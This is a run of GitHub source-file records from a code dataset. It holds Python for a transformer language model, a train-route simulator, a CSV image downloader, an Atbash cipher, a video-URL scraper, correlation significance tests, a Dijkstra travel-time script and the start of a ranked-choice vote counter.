return attention_scores\n\n\nclass JapaneseStableLMAlphaForCausalLM(JapaneseStableLMAlphaPreTrainedModel):\n _tied_weights_keys = [\"embed_out.weight\"]\n\n def __init__(self, config):\n super().__init__(config)\n\n self.transformer = JapaneseStableLMAlphaModel(config)\n self.embed_out = nn.Linear(config.hidden_size, config.vocab_size, bias=False)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_output_embeddings(self):\n return self.embed_out\n\n def set_output_embeddings(self, new_embeddings):\n self.embed_out = new_embeddings\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n r\"\"\"\n Example:\n\n ```python\n >>> import torch\n >>> from transformers import LlamaTokenizer, JapaneseStableLMAlphaForCausalLM, JapaneseStableLMAlphaConfig\n\n >>> tokenizer = LlamaTokenizer.from_pretrained(\"novelai/nerdstash-tokenizer-v1\")\n >>> config = JapaneseStableLMAlphaConfig.from_pretrained(\"stabilityai/stablelm-ja-base-alpha-7b\")\n >>> config.is_decoder = True\n >>> model = JapaneseStableLMAlphaForCausalLM.from_pretrained(\"stabilityai/stablelm-ja-base-alpha-7b\", config=config, trust_remote_code=True)\n\n >>> inputs = tokenizer(\"日本語の美しいところは、\", return_tensors=\"pt\")\n >>> outputs = model(**inputs)\n\n >>> prediction_logits = outputs.logits\n ```\"\"\"\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n outputs = self.transformer(\n input_ids,\n attention_mask=attention_mask,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n hidden_states = outputs[0]\n lm_logits = self.embed_out(hidden_states)\n\n lm_loss = None\n if labels is not None:\n # move labels to correct device to enable model parallelism\n labels = labels.to(lm_logits.device)\n # we are doing next-token prediction; shift prediction scores and input ids by one\n shift_logits = lm_logits[:, :-1, :].contiguous()\n labels = labels[:, 1:].contiguous()\n loss_fct = CrossEntropyLoss()\n lm_loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return ((lm_loss,) + output) if lm_loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def prepare_inputs_for_generation(\n self, input_ids, past_key_values=None, attention_mask=None, inputs_embeds=None, **kwargs\n ):\n input_shape = input_ids.shape\n\n # cut decoder_input_ids if past is used\n if past_key_values and past_key_values[0] is not None:\n input_ids = input_ids[:, -1:]\n\n position_ids = kwargs.get(\"position_ids\", None)\n if attention_mask is not None and position_ids is None:\n # create position_ids on the fly for batch generation\n position_ids = attention_mask.long().cumsum(-1) - 1\n position_ids.masked_fill_(attention_mask == 0, 1)\n if past_key_values:\n position_ids = position_ids[:, -1].unsqueeze(-1)\n\n # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly\n if attention_mask is None:\n attention_mask = input_ids.new_ones(input_shape)\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"attention_mask\": attention_mask,\n \"past_key_values\": past_key_values,\n \"position_ids\": position_ids,\n }\n )\n\n return model_inputs\n\n def _reorder_cache(self, past_key_values, beam_idx):\n reordered_past = ()\n for layer_past in past_key_values:\n reordered_past += (\n tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2])\n + layer_past[2:],\n )\n return reordered_past\n","repo_name":"turingmotors/heron","sub_path":"heron/models/git_llm/git_japanese_stablelm_alpha/modeling_japanese_stablelm_alpha.py","file_name":"modeling_japanese_stablelm_alpha.py","file_ext":"py","file_size_in_byte":29006,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"68"} +{"seq_id":"11385706467","text":"import datetime\nfrom collections import defaultdict\nfrom trainsimulator.util import sort_time, verify_time_format, convert_to_datetime, convert_to_timedelta\nfrom trainsimulator.exception import (\n InvalidTimeTable, InvalidNetwork, InvalidStation, InvalidTimeFormat)\n\n\ndef time_span_decorator(func):\n def wrapper(*args):\n time_sequence = args[1]\n duration = args[2]\n arrival_time = args[3]\n time_sequence = convert_to_datetime(time_sequence)\n duration = convert_to_timedelta(duration)\n arrival_time = convert_to_datetime(arrival_time)\n\n return func(args[0], time_sequence, duration, arrival_time)\n\n return wrapper\n\n\nclass Journey(object):\n \"\"\"\n This class defines the connection between two nodes in the network as Journey, and stores the timetable information\n such as departure time and duration.\n \n Note: self._timetable is a dictionary in the format of departure_time: [duration]\n \"\"\"\n\n def __init__(self, start_station, end_station):\n self._start_station = start_station\n self._end_station = end_station\n self._timetable = {}\n self._departure_time = None\n\n @property\n def timetable(self):\n return self._timetable\n\n @timetable.setter\n def timetable(self, time_table):\n self._timetable = self._uniformat_timetable(time_table)\n\n @property\n def duration(self):\n return self.timetable['duration']\n\n @property\n def start_station(self):\n return self._start_station\n\n @property\n def end_station(self):\n return self._end_station\n\n @property\n def departure_time(self):\n if self._departure_time is None:\n self._departure_time = self._extract_departure_time()\n\n return self._departure_time\n\n def arrival_time(self, departure_time):\n if departure_time not in self.timetable.get('departure_time'):\n return\n duration = self.timetable['duration']\n departure_time_stamp = datetime.datetime.strptime(departure_time, '%H:%M')\n duration_hour, duration_min = duration.split(':')\n duration_time_stamp = datetime.timedelta(hours=int(duration_hour), minutes=int(duration_min))\n arrival_time = (departure_time_stamp + duration_time_stamp).strftime('%H:%M')\n return datetime.datetime.strptime(arrival_time, '%H:%M')\n\n def _extract_departure_time(self):\n return self.timetable['departure_time']\n\n def departure_arrival_time_table(self):\n time_table = [(departure_time, self.arrival_time(departure_time).strftime('%H:%M'))\n for departure_time in self.departure_time]\n return time_table\n\n def _uniform_time_format(self, time_str):\n if not time_str or not verify_time_format(time_str):\n return None\n\n hour, minute = time_str.split(':')\n new_format = ['0' + i if len(i) == 1 else i for i in [hour, minute]]\n return ':'.join(new_format)\n\n def _uniformat_timetable(self, time_table):\n sanitized_time_format = []\n if time_table.get('departure_time') and time_table.get('duration'):\n for time_stamp in time_table['departure_time']:\n if isinstance(time_stamp, str):\n sanitized_time_ = self._uniform_time_format(time_stamp)\n if sanitized_time_:\n sanitized_time_format.append(sanitized_time_)\n else:\n raise InvalidTimeFormat\n else:\n raise InvalidTimeFormat\n time_table['departure_time'] = sanitized_time_format\n return time_table\n else:\n raise InvalidTimeTable\n\n\nclass TrainNetwork(object):\n def __init__(self):\n \"\"\"\n This class defines the train network, and it has the methods to find all the paths, time table, shortest journey\n from one station to another, \n self.journey is the list of dictionary with format {'start_station': [journey_instances]}\n \"\"\"\n self.journey = defaultdict(list)\n self.all_station = set()\n\n def _journey_instance(self, start_station):\n if start_station not in self.journey:\n return\n\n return self.journey[start_station]\n\n def journey_duration(self, start_station, end_station):\n journey_instance = [i for i in self._journey_instance(start_station) if i.end_station == end_station]\n return journey_instance[0].duration if journey_instance else None\n\n def build_network_from_nodes(self, nodes):\n \"\"\"\n This method builds the network from a node/nodes with the format start_station, end_station, time_table\n \n :param nodes: list of tuples\n :return: \n \"\"\"\n try:\n if not nodes:\n raise ValueError\n\n self.all_station = set()\n for node in nodes:\n start_station, end_station, time_table = node\n journey = Journey(start_station, end_station)\n if time_table:\n journey.timetable = time_table\n self.journey[start_station].append(journey)\n self.all_station.update({start_station, end_station})\n except (ValueError, InvalidTimeTable):\n print('Invalid nodes, quit')\n raise InvalidNetwork\n\n def build_network_from_journey(self, journeys):\n \"\"\"\n This method builds the network from a list of Journey instance\n :param journeys: list of Journey instances\n :return: \n \"\"\"\n self.all_station = set()\n\n for journey in journeys:\n self.journey[journey.start_station].append(journey)\n self.all_station.update({journey.start_station, journey.end_station})\n\n def _find_next_station(self, start_station):\n if start_station not in self.journey:\n return\n journey_instances = self.journey[start_station]\n\n end_stations = [journey_instance.end_station for journey_instance in journey_instances]\n return end_stations\n\n def _arrival_time_before_departure_time(self, arrival_time, departure_time):\n time_sequence = []\n for time_stamp in [arrival_time, departure_time]:\n if isinstance(time_stamp, str) and verify_time_format(time_stamp):\n time_sequence.append(datetime.datetime.strptime(time_stamp, '%H:%M'))\n continue\n\n if isinstance(time_stamp, datetime.datetime):\n time_sequence.append(time_stamp)\n\n if len(time_sequence) == 2:\n time_difference = time_sequence[0] - time_sequence[1]\n return time_difference < datetime.timedelta(minutes=0)\n else:\n raise InvalidTimeFormat\n\n def _is_departure_station(self, station_name):\n return station_name in self.journey\n\n def _find_available_paths(self, start_station, end_station, result, results):\n \"\"\"\n This is recursive method is to find all the paths between any two stations\n :param start_station: str\n :param end_station: str\n :param result: initial value of this recursive function, which is the reference pointing to the \n initial value [start_station]\n :param results: reference to a list which stores the result\n :return: \n \"\"\"\n next_station = self._find_next_station(start_station)\n if not result or not next_station:\n return None\n\n for i in next_station:\n\n if i in result:\n continue\n if i == end_station:\n results.append(result + [i])\n continue\n result.append(i)\n temp_result = self._find_available_paths(i, end_station, result, results)\n if not temp_result:\n result.pop()\n continue\n result = temp_result\n return result[:-1]\n\n def all_valid_journey(self, start_station, end_station):\n \"\"\"\n This method is to generate all the paths from any start station to any end station, which is the \n wrapper of self._find_available_paths method\n \n :param start_station: str\n :param end_station: str\n :return: list of paths\n \"\"\"\n if start_station not in self.all_station or end_station not in self.all_station:\n raise InvalidStation\n\n result = [start_station]\n results = []\n self._find_available_paths(start_station, end_station, result, results)\n return results\n\n def _departure_arrival_time_table(self, start_station, end_station):\n if start_station not in self.journey:\n return\n for journey in self.journey[start_station]:\n if journey.end_station == end_station:\n return journey.departure_arrival_time_table()\n\n def _time_table_from_route(self, route):\n \"\"\"\n This method is to generate the timetable of the route\n :param route: list of station name, e.g ['A', 'B', 'E']\n :return: timetable \n \"\"\"\n trip_time_table = []\n for index, start_stop in enumerate(route[:-1]):\n next_stop = route[index + 1]\n\n time_table = self._departure_arrival_time_table(start_stop, next_stop)\n trip_time_table.append(dict(time_table))\n\n return trip_time_table\n\n def _earliest_departure_time(self, arrival_time, next_stop_timetable):\n \"\"\"\n This method is to find the earliest departure time to the next city after the train arrives the current city\n :param arrival_time: \n :param next_stop_timetable: \n :return: earliest departure time to the next city\n \"\"\"\n earliest_departure_time_ = None\n next_stop_departure_time = sort_time(list(next_stop_timetable.keys()))\n for departure_time in next_stop_departure_time:\n if self._arrival_time_before_departure_time(arrival_time, departure_time):\n earliest_departure_time_ = departure_time\n break\n\n return earliest_departure_time_.strftime('%H:%M') if earliest_departure_time_ else next_stop_departure_time[\n 0].strftime('%H:%M')\n\n @time_span_decorator\n def _time_span(self, time_sequence, duration, arrival_time):\n \"\"\"\n This method is to calculate the duration from the first city departure time to last city arrival time\n :param time_sequence: list of time \n :param duration: list of duration between adjacent stops\n :param arrival_time: arrival time of each city\n :return: \n \"\"\"\n accumulated_time = datetime.timedelta(hours=0, minutes=0)\n last_index = len(time_sequence) - 2\n for index, time in enumerate(time_sequence[:-1]):\n if index == last_index:\n accumulated_time = accumulated_time + duration[index]\n break\n departure_time = time_sequence[index + 1]\n arrival_time_ = arrival_time[index]\n\n if arrival_time_ <= departure_time:\n time_interval = duration[index] + departure_time - arrival_time_\n else:\n time_interval = duration[index] + departure_time - arrival_time_ + datetime.timedelta(hours=24)\n\n accumulated_time = accumulated_time + time_interval\n\n if accumulated_time.days > 0:\n hour_, minutes, _ = str(accumulated_time).split(',')[1].strip().split(':')\n new_hours = int(hour_) + 24 * accumulated_time.days\n\n return ':'.join([str(new_hours), str(int(minutes))])\n\n hour_, minutes, _ = str(accumulated_time).split(':')\n\n return ':'.join([str(int(hour_)), str(int(minutes))])\n\n def _shortest_time_span(self, time_table, route):\n \"\"\"\n This method is to calculate shortest journey length travelling from the first station of the journey to the last \n :param time_table: \n :return: shortest time\n \"\"\"\n result = []\n total_routes = len(time_table)\n duration = [self.journey_duration(station, route[i + 1]) for i, station in enumerate(route[:-1])]\n for first_departure_time, arrival_time in time_table[0].items():\n arrival_time_list = [arrival_time]\n available_departure_time = [first_departure_time]\n earliest_arrival_time = arrival_time\n for route_index, timetable in enumerate(time_table[1:], 1):\n\n earliest_departure_time = self._earliest_departure_time(earliest_arrival_time, timetable)\n earliest_arrival_time = timetable[earliest_departure_time]\n arrival_time_list.append(earliest_arrival_time)\n available_departure_time.append(earliest_departure_time)\n if route_index == total_routes - 1:\n available_departure_time.append(earliest_arrival_time)\n result.append({'time_sequence': available_departure_time,\n 'duration': duration, 'arrival_time': arrival_time_list})\n time_consumed = [self._time_span(i['time_sequence'], i['duration'], i['arrival_time']) for i in result]\n return min(time_consumed)\n\n def shortest_route(self, start_station, end_station):\n \"\"\"\n This method is to find all the paths from start_station to end_station, and corresponding timetable from which \n shortest journey is found\n :param start_station: str\n :param end_station: str\n :return: shortest path from start_station to end_station, duration of this path\n \"\"\"\n all_paths = self.all_valid_journey(start_station, end_station)\n journey_len = {}\n for route in all_paths:\n time_table = self._time_table_from_route(route)\n if not time_table:\n continue\n shortest_time = self._shortest_time_span(time_table, route)\n journey_len[''.join(route)] = shortest_time\n\n if journey_len:\n quickest_path = min(journey_len, key=journey_len.get)\n return quickest_path, journey_len[quickest_path]\n","repo_name":"arturogonzalezm/trainsimulator","sub_path":"trainsimulator/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73216148377","text":"import requests\nimport csv\nimport sys\nfrom datetime import datetime\nimport os\n\ncsv_path = sys.argv[1]\nimg_path = sys.argv[2]\n\ndt_time = datetime.today().strftime('%Y-%m-%d')\nos.mkdir(img_path + dt_time)\n\nwith open(csv_path,'r') as file:\n reader = csv.reader(file, delimiter=';')\n next(reader)\n \n for count, row in enumerate(reader):\n image_et = row[13]\n response_et = requests.get(image_et)\n file_et = open(img_path + dt_time + '\\\\' + str(count) +'_image_et.jpg', 'wb')\n file_et.write(response_et.content)\n file_et.close()\n \n \n image_cs = row[14]\n response_cs = requests.get(image_cs)\n file_cs = open(img_path + dt_time + '\\\\'+ str(count) +'_image_cs.jpg', 'wb')\n file_cs.write(response_cs.content)\n file_cs.close()","repo_name":"MaaYuu/Online_Arbitrage_project","sub_path":"online_arbitrage/image_download.py","file_name":"image_download.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40691712409","text":"def decode(string):\n\tstring = ''.join(ch for ch in string.lower() if ch.isalnum())\n\treturn_str = ''\n\tfor x in string:\n\t\tif x.isalpha():\n\t\t\t25 - ord('a') + 97\n\t\t\tchar = chr(25 - ord(x) + 97 + ord('a'))\n\t\t\treturn_str += char\n\t\telse:\n\t\t\treturn_str += x\n\treturn return_str\n\ndef encode(string): \n\tstring = decode(string)\n\tstr_list = []\n\twhile len(string) > 5:\n\t\tstr_list.append(string[:5])\n\t\tstring = string[5:]\n\tif string:\n\t\tstr_list.append(string)\n\treturn ' '.join(str_list)\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/atbash-cipher/f2e9f5db90f84382934cfdffade3f548.py","file_name":"f2e9f5db90f84382934cfdffade3f548.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"367227125","text":"import re\nfrom bs4 import BeautifulSoup\nfrom urllib import request, parse\n\n\nclass CrackUtils:\n\n @staticmethod\n def video_crack(item):\n get_url = 'http://www.wq114.org/x2/tong.php?url=%s' % item['video_url']\n get_movie_url = 'http://www.wq114.org/x2/api.php'\n head = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',\n 'Referer': get_url\n }\n get_url_req = request.Request(url=get_url, headers=head)\n get_url_response = request.urlopen(get_url_req)\n get_url_html = get_url_response.read().decode('utf-8')\n bf = BeautifulSoup(get_url_html, 'lxml')\n a = str(bf.find_all('script'))\n pattern = re.compile(\"url : '(.+)',\", re.IGNORECASE)\n allPattern = pattern.findall(a)\n if len(allPattern) == 0:\n raise Exception\n url = allPattern[0]\n get_movie_data = {\n 'up': '0',\n 'url': '%s' % url,\n }\n get_movie_req = request.Request(url=get_movie_url, headers=head)\n get_movie_data = parse.urlencode(get_movie_data).encode('utf-8')\n get_movie_response = request.urlopen(get_movie_req, get_movie_data)\n get_movie_html = get_movie_response.read().decode('utf-8')\n respJson = eval(get_movie_html)\n item['h5_url'] = str(respJson['url']).replace(\"\\/\", \"/\")\n item = CrackUtils.resource_crack(item)\n return item\n\n @staticmethod\n def resource_crack(item):\n get_url = item['h5_url']\n if str(get_url).endswith(\".m3u8\") or str(get_url).endswith(\".mp4\"):\n item['resource_url'] = get_url\n return item\n head = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',\n 'Referer': get_url\n }\n get_url_req = request.Request(url=get_url, headers=head)\n get_url_response = request.urlopen(get_url_req)\n get_url_html = get_url_response.read().decode('utf-8')\n bf = BeautifulSoup(get_url_html, 'lxml')\n a = str(bf.find_all('script'))\n pattern = re.compile(\"hls.loadSource\\('(.+)'\\)\", re.IGNORECASE)\n resourceAll = pattern.findall(a)\n if len(resourceAll) > 0:\n url = str(pattern.findall(a)[0]).replace(\"\\/\", \"/\")\n item['resource_url'] = url\n return item\n","repo_name":"hjcenry/VideoCrawer","sub_path":"video_url_crawler_demo/spiders/crackutils.py","file_name":"crackutils.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23933779124","text":"\"\"\"Tests of equal correlation hypothesis\n\nThe module contains methods testing hypothesis of\ncorrelation equality\n\"\"\"\n\n\nimport numpy as np\nimport scipy.stats\nfrom .correlation_utils import \\\n pearsonr_mean, pearsonr_std\n\ndef ztest(\n first_rs, first_size,\n second_rs, second_size,\n correlation=\"spearman\",\n alternative=\"two-sided\"\n):\n \"\"\"Check the hypothesis that pearson correlations\n are equal\n\n Parameters\n ----------\n first_rs: numerical value or list\n A sequence (potentially with one element)\n of correlations.\n first_size: numerical value or list\n Sizes of samples that were used to compute\n \"first_rs\" correlation(s).\n second_rs: numerical value or list\n A sequence (potentially with one element)\n of correlations.\n second_size: numerical value or list\n Sizes of samples that were used to compute\n \"second_rs\" correlation(s).\n alternative: \"two-sided\" (default), \"less\", \"greater\"\n Computes the probability of the following events:\n \"two-sided\" |arctanh(x1) - arctanh(x2)| >\n |arctanh(first_rs) - arctanh(second_rs)|,\n \"less\" arctanh(x1) - arctanh(x2) <=\n arctanh(first_rs) - arctanh(second_rs) ,\n \"greater\" arctanh(x1) - arctanh(x2) >\n arctanh(first_rs) - arctanh(second_rs).\n \n Returns\n -------\n pair of numerical values or numpy.arrays respectively to the input\n Contains statistic and pvalue.\n \"\"\"\n\n if len(first_rs) != len(second_rs):\n return None\n result_len = len(first_rs)\n\n first_rs = np.array(first_rs)\n first_size = np.array(first_size)\n \n second_rs = np.array(second_rs)\n second_size = np.array(second_size)\n \n bound_indexes = (np.abs(first_rs + second_rs) == 2) | \\\n (first_rs == None) | (second_rs == None)\n bound_indexes = ~bound_indexes\n\n first_rs = first_rs[bound_indexes]\n second_rs = second_rs[bound_indexes]\n\n first_ss = pearsonr_std(first_rs, first_size)\n second_ss = pearsonr_std(second_rs, second_size)\n \n if (correlation==\"spearman\"):\n first_ss *= np.sqrt(1.5)\n second_ss *= np.sqrt(1.5)\n\n stat = np.arctanh(first_rs) - np.arctanh(second_rs)\n std = np.sqrt(first_ss**2 + second_ss**2)\n \n pvalue = None\n \n if (alternative == \"less\"):\n pvalue = scipy.stats.norm.cdf(stat, scale=std)\n elif (alternative == \"greater\"):\n pvalue = 1 - scipy.stats.norm.cdf(stat, scale=std)\n elif (alternative == \"two-sided\"):\n pvalue = 2 * scipy.stats.norm.cdf(-np.abs(stat), scale=std)\n\n stat_result = np.zeros(result_len, dtype=\"float32\")\n pvalue_result = np.zeros(result_len, dtype=\"float32\")\n \n stat_result[~bound_indexes] = None\n pvalue_result[~bound_indexes] = None\n \n stat_result[bound_indexes] = stat\n pvalue_result[bound_indexes] = pvalue\n\n return stat_result, pvalue_result\n","repo_name":"zhiyanov/DCoNA","sub_path":"dcona/core/correlations/correlation_tests.py","file_name":"correlation_tests.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"35777892096","text":"\ndef func(sp,weightdf,vehicle_path,plate):\n dflist = []\n # for jj in range(0,3):\n for jj in range(0,len(sp)):\n # match the indeces of filtered movements\n df = sp.loc[sp.index==jj]\n TravelTime = float(df['duration'])\n if TravelTime > 40:\n continue\n if TravelTime < 2:\n continue\n\n # split 'date' & 'start_time' & 'end_time' of (marginal.csv) file\n df['Dates'] = pd.to_datetime(df['first_time']).dt.date\n s = pd.to_datetime(df['last_time']).dt.date\n if df['Dates'].iloc[0]!=s.iloc[0]:\n continue\n df['HrMin_start'] = pd.to_datetime(df['first_time']).dt.strftime('%H:%M')\n df['HrMin_end'] = pd.to_datetime(df['last_time']).dt.strftime('%H:%M')\n\n # Open (matched_index.csv) file that matches the date of current sp trip\n str_date = str(df['Dates'].iloc[0])\n matchedroadID_file = [str(f) for f in os.listdir(vehicle_path) if \n re.match(rf'.*{re.escape(str_date)}.*_indexes', f)]\n \n # for some days there is no file. Ignore them\n if bool(matchedroadID_file):\n full_path_ID = vehicle_path+'\\\\'+matchedroadID_file[0]\n df_id = pd.read_csv(full_path_ID)\n else:\n continue\n\n # Open (edges_all.csv) file that matches the date of current sp trip\n matchedroadall_file = [str(f) for f in os.listdir(vehicle_path) if \n re.match(rf'.*{re.escape(str_date)}.*_all', f)]\n full_path_all = vehicle_path+'\\\\'+matchedroadall_file[0]\n df_all = pd.read_csv(full_path_all)\n df_all['HrMin'] = pd.to_datetime(df_all['datetime']).dt.strftime('%H:%M')\n first_index = df_all[df_all['HrMin'] == df['HrMin_start'].iloc[0]].index[0]\n last_in = df_all[df_all['HrMin'] == df['HrMin_end'].iloc[0]].index\n last_index = last_in[-1]\n df_specific = df_all[(df_all.index >= first_index) & (df_all.index <= last_index)]\n EdgeIndex_unique1 = df_specific['EdgeIndex'].unique()\n df_matched = getsp.find_chunk(df_specific, df_id, EdgeIndex_unique1)\n\n if df_matched is None:\n continue\n \n EdgeIndex_unique = df_matched['Index'].unique()\n if len(EdgeIndex_unique) < 2:\n continue\n EdgeIndex_unique = df_matched['Index'].unique()\n new_df = t.calc_time(df_specific)\n y = new_df['TimeDiff0'].iloc[:].sum()\n #_____________________weight_df_____________________#\n df_specific['hour'] = pd.to_datetime(df_specific['datetime']).dt.strftime('%H')\n hr = int(df_specific['hour'].iloc[0]) \n time_list = []\n for ind, row in weightdf.iterrows():\n traversetime = row['weight'][hr]\n time_list.append(traversetime)\n # define the traversal time of an edge at a specific time as weight (instead of velocity weight)\n weightdf['weight(s)'] = time_list\n \n # _____________________network_______________________#\n # Extract required data from testing trip: duration, source_node, target_node, hour\n for i in EdgeIndex_unique:\n if i in weightdf['EdgeID'].values:\n start = i\n break\n if EdgeIndex_unique[-2] not in weightdf['EdgeID'].values:\n a = [i in weightdf['EdgeID'].values for i in EdgeIndex_unique]\n output = [idx for idx, element in enumerate(a) if element==False][0]\n end = EdgeIndex_unique[output-1]\n else:\n end = EdgeIndex_unique[-2]\n source = weightdf.loc[weightdf['EdgeID'] == start, 'from_node'].iloc[0]\n try:\n target = weightdf.loc[weightdf['EdgeID'] == end, 'to_node'].iloc[0]\n except (ValueError,IndexError):\n continue\n\n output = net.mynetwork(source,target,weightdf)\n\n if output is None:\n y_dijk1 = np.nan\n continue\n else:\n y_dijk1 = output[0]\n path_dijk = output[1]\n dijk_dist = output[2]\n\n # ______________________similarity_________________________#\n node_list1=[]\n for i in EdgeIndex_unique:\n try:\n df = weightdf.loc[weightdf['EdgeID']==i]\n node_list1.extend([df['from_node'].iloc[0],df['to_node'].iloc[0]])\n except (TypeError, IndexError):\n continue\n node_list_unique1 = list(set(node_list1))\n similarity = sum(i in node_list_unique1 for i in path_dijk)/len(node_list_unique1)\n sim = sum(i in node_list_unique1 for i in path_dijk)/len(path_dijk)\n #************** Total route travel time ******************\n sumtime_traversal = new_df['TimeDiff0'].iloc[:].sum() \n #**********************************************\n df_specific['hour'] = pd.to_datetime(df_specific['datetime']).dt.strftime('%H')\n #************** hour of day *************\n hr = int(df_specific['hour'].iloc[0]) # hour of day\n #***************** Total route distance ********************\n distance = df_matched['Distance'].sum()\n #**********************************************************\n\n tripdf = pd.DataFrame([{'travel time':sumtime_traversal,'hour of day':hr,\n 'distance': distance, 'est_dist': dijk_dist, 'similarity':similarity, 'similarity_dijk':sim}])\n\n\n dflist.append(tripdf)\n all_tripdf = pd.concat(dflist, axis=0, ignore_index=True)\n \n return all_tripdf\n\n\n\n\nimport re\nimport os\nimport pandas as pd\nimport numpy as np\nimport network as net\nimport SPpath_finder as getsp\nimport speed_file as t\n\n\n","repo_name":"ShimaRahmani/Seneca-Project","sub_path":"NN/travelfile_dijk.py","file_name":"travelfile_dijk.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40960653226","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 20:49:47 2020\n\n@author: elliotgross\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport math\n\n\ndef undo_levels(df):\n '''\n This method strips the mutli-index and returns a dataframe with reseted indecies.\n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n\n Returns\n -------\n : pd.DataFrame\n A dataframe of all the votes, with reseted indecies.\n\n '''\n \n return df.reset_index().drop(['index','level_0'], axis=1, errors='ignore')\n\ndef eliminate_candidate(df, candidate):\n '''\n This method gets rid of all the instances of the inputed candidate and shifts \n the next choice vote over. \n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n candidate : String\n The candidate to be removed.\n\n Returns\n -------\n df : pd.DataFrame\n A dataframe with the inputed candidate removed\n\n '''\n df = undo_levels(df)\n \n\n for i,column in enumerate(df.columns.to_list()[:-1]):\n candidate_to_remove_index = df[df[column] == candidate].index\n \n #Shift from current column to final choice\n df.loc[candidate_to_remove_index,df.columns.to_list()[i:-1]] = df.loc[candidate_to_remove_index,\n df.columns.to_list()[:-1]].shift(-1,axis=1)\n \n # Re-Add Levels\n df = df.set_index(df.columns.to_list()[:-1]).sort_index()\n \n return df\n \ndef handle_winner(df, threshold, total_winners):\n '''\n This method finds the winner, calculates the new weight, distributes the votes using the new weight,\n and then removes the winner. Afterwards, the winner is added to the total_winners list. The df\n and total_winners are returned\n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n threshold : float\n The minimum amount of votes needed to secure a win.\n total_winners : list\n A list of the total winners.\n\n Returns\n -------\n df : pd.DataFrame\n A dataframe of all the votes, with the votes redistributed and the winner removed.\n total_winners : list\n A list of the winners of the election.\n\n '''\n \n top_winner_row = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight'], ascending=False).iloc[0,:]\n \n winner_name, winner_votes = top_winner_row.name, top_winner_row['Weight']\n\n if winner_votes > threshold:\n new_weight = (winner_votes-threshold)/winner_votes\n \n df = undo_levels(df)\n \n #Redistribute Vote\n winner_rows_index = df[df['Choice 1'] == winner_name].index\n df.loc[winner_rows_index,'Weight'] *= new_weight\n \n #Get Rid of Winner\n df = eliminate_candidate(df, winner_name)\n\n total_winners.append(winner_name)\n \n return df, total_winners\n\ndef handle_loser(df):\n '''\n This method first calculates the loser and then removes them from the dataframe\n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n\n Returns\n -------\n df : pd.DataFrame\n A dataframe of all the votes with the loser removed.\n\n '''\n \n loser_name = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight']).iloc[0,:].name\n df = eliminate_candidate(df, loser_name)\n \n return df\n\n \ndef check_for_winner(df, threshold):\n '''\n This method first calculates the winner and returns the logistical outcome of the winner having\n more votes than the threshold.\n\n Parameters\n ----------\n df : pd.DataFrame\n A dataframe of all the votes.\n threshold : float\n The minimum amount of votes needed to secure a win.\n\n Returns\n -------\n : bool\n The outcome of the winner having more votes than the threshold.\n\n '''\n \n top_winner_row = df.reset_index().groupby(['Choice 1']).sum().sort_values(['Weight'], ascending=False).iloc[0,:]\n winner_votes = top_winner_row['Weight']\n \n return winner_votes > threshold\n \n \ndef prepare_data(csv_filename, candidates):\n '''\n This method takes in a csv filename and the candidates and returns a multi-indexed,\n prepared dataframe.\n\n 